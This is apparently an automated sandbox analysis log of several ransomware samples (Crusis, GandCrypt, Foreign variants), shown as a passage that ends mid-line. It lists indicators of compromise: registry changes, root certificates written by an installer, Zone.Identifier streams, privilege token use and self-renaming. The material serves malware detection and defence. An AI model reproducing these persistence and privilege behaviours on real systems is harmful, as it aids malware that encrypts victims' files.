\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 FB_8EBE.tmp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff FB_8EBE.tmp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" FB_8EBE.tmp.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 y_installer.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier cmd.exe File opened for modification C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 1052 powershell.exe 1052 powershell.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2144 7zFM.exe 5056 taskmgr.exe 3432 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 6620 Trojan-Ransom.Win32.Foreign.oafd-3887453dd2419266bdba711d7dffabff1f7ec5b2eef4d219e0b86103566192a2.exe 5248 control.exe 3432 Explorer.EXE 3432 Explorer.EXE 5248 control.exe 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 5616 Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2144 7zFM.exe Token: 35 2144 7zFM.exe Token: SeSecurityPrivilege 2144 7zFM.exe Token: SeDebugPrivilege 3232 taskmgr.exe Token: SeSystemProfilePrivilege 3232 taskmgr.exe Token: SeCreateGlobalPrivilege 3232 taskmgr.exe Token: SeDebugPrivilege 5056 taskmgr.exe Token: SeSystemProfilePrivilege 5056 taskmgr.exe Token: SeCreateGlobalPrivilege 5056 taskmgr.exe Token: 33 3232 taskmgr.exe Token: SeIncBasePriorityPrivilege 3232 taskmgr.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 